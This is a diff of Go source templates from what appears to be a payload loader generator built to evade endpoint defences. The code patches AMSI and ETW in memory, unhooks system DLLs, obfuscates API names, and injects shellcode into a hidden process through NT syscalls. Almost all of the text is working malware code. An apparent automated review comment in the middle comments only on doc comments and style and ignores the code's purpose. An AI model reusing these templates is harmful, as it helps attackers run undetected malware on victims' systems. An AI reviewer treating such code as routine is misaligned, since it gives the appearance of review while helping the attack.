func {{.Variables.AMSI}}() { - var {{.Variables.handle}} uint64 - {{.Variables.handle}} = 0xffffffffffffffff - {{.Variables.ll}}, _ := windows.LoadLibrary("amsi.dll") - {{.Variables.addr}}, _ := windows.GetProcAddress({{.Variables.ll}}, "AmsiScanBuffer") - {{.Variables.data}}, _ := hex.DecodeString("B857000780C3") - var {{.Variables.nLength}} uintptr - {{.Variables.datalength}} := len({{.Variables.data}}) - 
{{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), uintptr(uint({{.Variables.addr}})), &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) - } - ` -} - -func Procces_Injection_DLL() string { - return ` - package main - - import "C" - - import ( - - "debug/pe" - "encoding/base64" - "encoding/hex" - "fmt" - "[loader]/[loader]" - "io/ioutil" - "syscall" - "time" - "unsafe" - "strconv" - - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" - - ) - -const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF -) -var _ unsafe.Pointer -var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.Version}} string - {{.Variables.number}} int = {{.Variables.b64number}} -) - - -var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc("WriteProcessMemory") -var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtCreateThreadEx") -var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtWriteVirtualMemory") -var {{.Variables.funcNtAllocateVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtAllocateVirtualMemory") -var {{.Variables.funcNtProtectVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtProtectVirtualMemory") - -var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("EnumProcessModules") -var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleBaseNameW") -var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleInformation") - - -func errno(e1 error) error { - if e1, ok := e1.(syscall.Errno); ok && e1 == 0 { - e1 = 
syscall.EINVAL - } - return e1 -} - -type SyscallError struct { - call string - err error -} - -func (e *SyscallError) Error() string { - return fmt.Sprintf("%s: %v", e.call, e.err) -} - -const ( - MEM_FREE = 0x100 << 8 - MEM_COMMIT = 0x10 << 8 - MEM_RESERVE = 0x20 << 8 -) - -type StartupInfoEx struct { - windows.StartupInfo - AttributeList *PROC_THREAD_ATTRIBUTE_LIST -} -type PROC_THREAD_ATTRIBUTE_LIST struct { - dwFlags uint32 - size uint64 - count uint64 - reserved uint64 - unknown *uint64 - entries []*PROC_THREAD_ATTRIBUTE_ENTRY -} -type PROC_THREAD_ATTRIBUTE_ENTRY struct { - attribute *uint32 - cbSize uintptr - lpValue uintptr -} - -type MemoryBasicInfo struct { - BaseAddress uintptr - AllocationBase uintptr - AllocationProtect uint32 - RegionSize uintptr - State uint32 - Protect uint32 - Type uint32 -} - -type MODULEINFO struct { - LpBaseOfDll uintptr - SizeOfImage uint32 - EntryPoint uintptr -} - -func {{.Variables.CreateProcess}}() *syscall.ProcessInformation { - var {{.Variables.si}} syscall.StartupInfo - var {{.Variables.pi}} syscall.ProcessInformation - - {{.Variables.Target}} := "{{.Variables.processpath}}" - {{.Variables.commandLine}}, {{.Variables.err}} := syscall.UTF16PtrFromString({{.Variables.Target}}) - - if {{.Variables.err}} != nil { - panic({{.Variables.err}}) - } - var {{.Variables.startupInfo}} StartupInfoEx - {{.Variables.si}}.Cb = uint32(unsafe.Sizeof({{.Variables.startupInfo}})) - {{.Variables.si}}.Flags |= windows.STARTF_USESHOWWINDOW - {{.Variables.si}}.ShowWindow = windows.SW_HIDE - - {{.Variables.err}} = syscall.CreateProcess( - nil, - {{.Variables.commandLine}}, - nil, - nil, - false, - 0, - nil, - nil, - &{{.Variables.si}}, - &{{.Variables.pi}}) - - if {{.Variables.err}} != nil { - panic({{.Variables.err}}) - } - - return &{{.Variables.pi}} -} -func {{.Variables.GetModuleInformation}}({{.Variables.hProcess}} windows.Handle, {{.Variables.hModule}} windows.Handle) (MODULEINFO, error) { - {{.Variables.mi}} := MODULEINFO{} - _, _, 
{{.Variables.err}} := {{.Variables.procGetModuleInformation}}.Call( - uintptr({{.Variables.hProcess}}), - uintptr({{.Variables.hModule}}), - uintptr(unsafe.Pointer(&{{.Variables.mi}})), - uintptr(uint32(unsafe.Sizeof({{.Variables.mi}})))) - if {{.Variables.err}}.(syscall.Errno) != 0 { - return {{.Variables.mi}}, {{.Variables.err}} - } - return {{.Variables.mi}}, nil -} - -func {{.Variables.GetModuleBaseName}}({{.Variables.process}} windows.Handle, {{.Variables.module}} windows.Handle, {{.Variables.outString}} *uint16, {{.Variables.size}} uint32) ({{.Variables.n}} int, err error) { - r1, _, e1 := {{.Variables.procGetModuleBaseName}}.Call( - uintptr({{.Variables.process}}), - uintptr({{.Variables.module}}), - uintptr(unsafe.Pointer({{.Variables.outString}})), - uintptr({{.Variables.size}}), - ) - if r1 == 0 { - return 0, errno(e1) - } - return int(r1), nil -} - -func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{.Variables.modules}} []windows.Handle) ({{.Variables.n}} int, {{.Variables.err}} error) { - var {{.Variables.needed}} int32 - const {{.Variables.handleSize}} = unsafe.Sizeof({{.Variables.modules}}[0]) - r1, _, e1 := {{.Variables.procEnumProcessModules}}.Call( - uintptr({{.Variables.process}}), - uintptr(unsafe.Pointer(&{{.Variables.modules}}[0])), - {{.Variables.handleSize}}*uintptr(len({{.Variables.modules}})), - uintptr(unsafe.Pointer(&{{.Variables.needed}})), - ) - if r1 == 0 { - {{.Variables.err}} = errno(e1) - return 0, {{.Variables.err}} - } - {{.Variables.n}} = int(uintptr({{.Variables.needed}}) / {{.Variables.handleSize}}) - return {{.Variables.n}}, nil -} - -func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} 
+= i - } - return string({{.Variables.decoded}}) - -} - - -{{.Variables.Sandboxfunction}} - - -func {{.Variables.Versionfunc}}() string { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.SyscallNumberlist}} - -} - -{{.Variables.WriteProcessMemory_Function}} - -{{.Variables.ETW_Function}} - -{{.Variables.AMSI_Function}} - - -func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - } -} - -func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { - {{.Variables.pi}} := {{.Variables.CreateProcess}}() - time.Sleep(5 * time.Second) - if {{.Variables.Version}} == "10.0" { - {{.Variables.hh}}, {{.Variables.err}} := windows.OpenProcess({{.Variables.PROCESS_ALL_ACCESS}}, false, {{.Variables.pi}}.ProcessId) - if {{.Variables.err}} != nil { - } - 
{{.Variables.modules}} := make([]windows.Handle, 255) - {{.Variables.n}}, {{.Variables.err}} := {{.Variables.EnumProcessModules}}({{.Variables.hh}}, {{.Variables.modules}}) - if {{.Variables.err}} != nil { - fmt.Println(&SyscallError{"EnumProcessModules", {{.Variables.err}}}) - } - if {{.Variables.n}} < len({{.Variables.modules}}) { - {{.Variables.modules}} = {{.Variables.modules}}[:{{.Variables.n}}] - } - var {{.Variables.buf}} = make([]uint16, 255) - for _, {{.Variables.mod}} := range {{.Variables.modules}} { - {{.Variables.MI}}, _ := {{.Variables.GetModuleInformation}}({{.Variables.hh}}, {{.Variables.mod}}) - {{.Variables.n}}, {{.Variables.err}} := {{.Variables.GetModuleBaseName}}({{.Variables.hh}}, {{.Variables.mod}}, &{{.Variables.buf}}[0], uint32(len({{.Variables.buf}}))) - if {{.Variables.err}} != nil { - } - {{.Variables.s}} := windows.UTF16ToString({{.Variables.buf}}[:{{.Variables.n}}]) - if {{.Variables.s}} == "ntdll.dll" { - {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\ntdll.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) - } - if {{.Variables.s}} == "KERNEL32.DLL" { - {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernel32.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) - } - if {{.Variables.s}} == "KERNELBASE.dll" { - {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernelbase.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) - } - } - } - {{.Variables.shellcode}} := {{.Variables.raw_bin}} - {{.Variables.oldProtect}} := windows.PAGE_READWRITE - var {{.Variables.lpBaseAddress}} uintptr - {{.Variables.size}} := len({{.Variables.shellcode}}) - - {{.Variables.funcNtAllocateVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), 0, uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) - - {{.Variables.funcNtWriteVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), 
{{.Variables.lpBaseAddress}}, uintptr(unsafe.Pointer(&{{.Variables.shellcode}}[0])), uintptr({{.Variables.size}}), 0) - - {{.Variables.funcNtProtectVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&{{.Variables.oldProtect}}))) - - {{.Variables.funcNtCreateThreadEx}}.Call(uintptr(unsafe.Pointer(&{{.Variables.pi}}.Thread)), windows.GENERIC_EXECUTE, 0, uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, {{.Variables.lpBaseAddress}}, 0, 0, 0, 0, 0) - - syscall.CloseHandle({{.Variables.pi}}.Thread) - -} - -func main() { -} - -{{.Variables.ExportName}} - - -//export Run -func Run() { - {{.Variables.Sandbox}} - {{.Variables.ETW}} - {{.Variables.AMSI}} - {{.Variables.Version}} = {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() - } - {{.Variables.ETW}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}}) -} - - -func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error { - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.name}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(".text") - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.dllBase}} := {{.Variables.addr}} - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.rawbytes}} := fmt.Sprintf("%X", {{.Variables.bytes}}) - {{.Variables.data}}, _ := hex.DecodeString(string({{.Variables.rawbytes}})) - 
{{.Variables.regionsize}} := len({{.Variables.bytes}}) - {{.Variables.offsetaddr}} := uintptr({{.Variables.dllOffset}}) - var {{.Variables.nLength}} uintptr - {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), {{.Variables.offsetaddr}}, &{{.Variables.data}}[0], uintptr(uint32({{.Variables.regionsize}})), &{{.Variables.nLength}}) - - return nil -} - - +func Binary() string { + return ` + {{.Variables.Header}} -func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} + func main() { + {{.Variables.Sandbox}} + {{.Variables.ETW}} + {{.Variables.AMSI}} + time.Sleep({{.Variables.SleepSecond}} * time.Millisecond) + {{.Variables.Version}} := {{.Variables.Versionfunc}}() + {{.Variables.VersionMessage}} + if {{.Variables.Version}} == "10" { + {{.Variables.Reloading}} + } + {{.Variables.ETW}} + {{.Variables.hide}} + {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() + {{.Variables.Shellcode_Exec_Function}}({{.Variables.raw_bin}}) } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr - {{.Variables.WriteProcessMemory}}({{.Variables.handlez}}, 
uintptr({{.Variables.dllOffset}}), &{{.Variables.bytes}}[0], uintptr(uint32(len({{.Variables.bytes}}))), & {{.Variables.oldfartcodeperms}}) + {{.Variables.Shellcode_Exec}} - return nil -} - - ` + {{.Variables.ReloadFunction}} +` } -func Procces_Injection() string { +func WriteProcessMemory_Function() string { return ` - package main + const ( + {{.Variables.errnoERROR_IO_PENDING}}= 997 + ) + var {{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}}) + var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.WriteProcessMemoryName}}")) - import ( + func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} uintptr, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} *byte, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) (err error) { + r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0) + if r1 == 0 { + if e1 != 0 { + err = {{.Variables.errnoErr}}(e1) + } else { + err = syscall.EINVAL + } + } + return + } - "debug/pe" - "encoding/base64" - "encoding/hex" - "[loader]/[loader]" - {{.Variables.DebugImport}} - "io/ioutil" - "syscall" - "fmt" - "time" - "unsafe" - "strconv" - {{.Variables.SandboxOS}} + func {{.Variables.errnoErr}}(e syscall.Errno) error { + switch e { + case 0: + return nil + case {{.Variables.errnoERROR_IO_PENDING}}: + return {{.Variables.errERROR_IO_PENDING}} + } + + return e + } + ` +} - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" +func ETW_Function() string { + return ` + var {{.Variables.procEtwNotificationRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 
'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwNotificationRegisterName}}")) + var {{.Variables.procEtwEventRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventRegisterName}}")) + var {{.Variables.procEtwEventWriteFull}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteFullName}}")) + var {{.Variables.procEtwEventWrite}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteName}}")) - ) + func {{.Variables.ETW}}() { + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} + for i, _ := range {{.Variables.dataAddr}} { + {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") + var {{.Variables.nLength}} uintptr + {{.Variables.datalength}} := len({{.Variables.data}}) + {{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) + } + } -const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF -) -var _ unsafe.Pointer + func {{.Variables.RemoteETW}}({{.Variables.handle}} windows.Handle) { + {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} + for i, _ := range {{.Variables.dataAddr}} { + {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") + var {{.Variables.nLength}} uintptr + {{.Variables.datalength}} := len({{.Variables.data}}) + {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], 
uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) + } + } -var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} -) +` +} +func AMSI_Function() string { + return ` + func {{.Variables.AMSI}}() { + var {{.Variables.handle}} uint64 + {{.Variables.handle}} = 0xffffffffffffffff + {{.Variables.ll}}, _ := windows.LoadLibrary(string([]byte{'a','m','s','i','.','d','l','l'})) + {{.Variables.addr}}, _ := windows.GetProcAddress({{.Variables.ll}}, string([]byte{'a','m','s','i','S','c','a','n','B','u','f','f','e','r'})) + {{.Variables.data}}, _ := hex.DecodeString("B857000780C3") + var {{.Variables.nLength}} uintptr + {{.Variables.datalength}} := len({{.Variables.data}}) + {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), uintptr(uint({{.Variables.addr}})), &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) + } + ` +} +func Procces_Injection() string { + return ` var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc("WriteProcessMemory") var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtCreateThreadEx") var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtWriteVirtualMemory") @@ -1286,9 +650,6 @@ var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL(string([]byte{'p' var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleBaseNameW") var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleInformation") -{{.Variables.Debug}} - - func errno(e1 error) error { if e1, ok := e1.(syscall.Errno); ok && e1 == 0 { e1 = syscall.EINVAL 
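Review bot: None of the exported generator functions added in this hunk — `DLL_Refresher`, `Binary`, `WriteProcessMemory_Function`, `ETW_Function`, `AMSI_Function` and the re-homed `Procces_Injection` — carry a doc comment, so godoc shows nothing for them; for example `// Binary returns the program template (Header plus a main function) for the executable output.` and `// DLL_Refresher returns the program template that exports Run for the DLL output.`. In the ETW template, `for i, _ := range {{.Variables.dataAddr}}` appears twice and should be `for i := range {{.Variables.dataAddr}}` (gofmt -s and vet flag the redundant blank). `RemoteETW` also repeats `ETW`'s loop body verbatim apart from the handle argument, so one of them could delegate to the other instead of duplicating it. The Header template this hunk opens inside starts in the previous hunk.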
@@ -1421,77 +782,9 @@ func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{ return {{.Variables.n}}, nil } -func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - -} - -{{.Variables.Sandboxfunction}} - - -func {{.Variables.Console}}(show bool) { - {{.Variables.getWin}} := syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.GetConsoleWindowName}}")) - {{.Variables.showWin}} := syscall.NewLazyDLL(string([]byte{'u', 's', 'e', 'r', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.ShowWindowName}}")) - {{.Variables.hwnd}}, _, _ := {{.Variables.getWin}}.Call() - if {{.Variables.hwnd}} == 0 { - return - } - if show { - var {{.Variables.SW_RESTORE}} uintptr = 9 - {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_RESTORE}}) - } else { - var {{.Variables.SW_HIDE}} uintptr = 0 - {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_HIDE}}) - } -} - -func {{.Variables.Versionfunc}}() string { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." 
+ strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.VersionMessage}} - {{.Variables.SyscallNumberlist}} - -} - - - -{{.Variables.WriteProcessMemory_Function}} - -{{.Variables.ETW_Function}} - -{{.Variables.AMSI_Function}} - -func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - {{.Variables.EDR}} -} -func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { +func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte) { {{.Variables.pi}} := {{.Variables.CreateProcess}}() {{.Variables.PPIDMessage}} time.Sleep(5 * time.Second) @@ -1532,6 +825,7 @@ func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { } } + {{.Variables.RemoteETW}}({{.Variables.hh}}) {{.Variables.Injecting}} {{.Variables.shellcode}} := {{.Variables.raw_bin}} {{.Variables.oldProtect}} := windows.PAGE_READWRITE 
@@ -1550,22 +844,6 @@ func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { {{.Variables.Injected}} } - -func main() { - {{.Variables.Sandbox}} - {{.Variables.ETW}} - {{.Variables.hide}} - {{.Variables.AMSI}} - {{.Variables.Version}} := {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() - } - {{.Variables.ETW}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}}) -} - - func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error { {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}}) if {{.Variables.error}} != nil { 
@@ -1588,35 +866,303 @@ func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variabl return nil } +` +} + +func Syscall_Alloc() string { + return ` + func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ + var {{.Variables.phandle}} uint64 + var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr + {{.Variables.phandle}} = 0xffffffffffffffff + {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) + {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) + {{.Variables.protect}} = 0x40 + {{.Variables.alloctype}} = 0x3000 + {{.Variables.AllocatingMessage}} + {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) + {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) + for x, y := range []byte({{.Variables.raw_bin}}) { + {{.Variables.buff}} [x] = y + } + {{.Variables.SyscallMessage}} + syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0,) + } + ` +} +func Syscall_RtlCopy() string { + return ` + func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ + {{.Variables.ntdll}} := windows.NewLazySystemDLL("ntdll.dll") + {{.Variables.kernel32}} := windows.NewLazySystemDLL("kernel32") + {{.Variables.RtlCopyMemory}} := {{.Variables.ntdll}}.NewProc("RtlCopyMemory") + {{.Variables.VirtualAlloc}} := {{.Variables.kernel32}}.NewProc("VirtualAlloc") -func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.ReloadingMessage}} - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := 
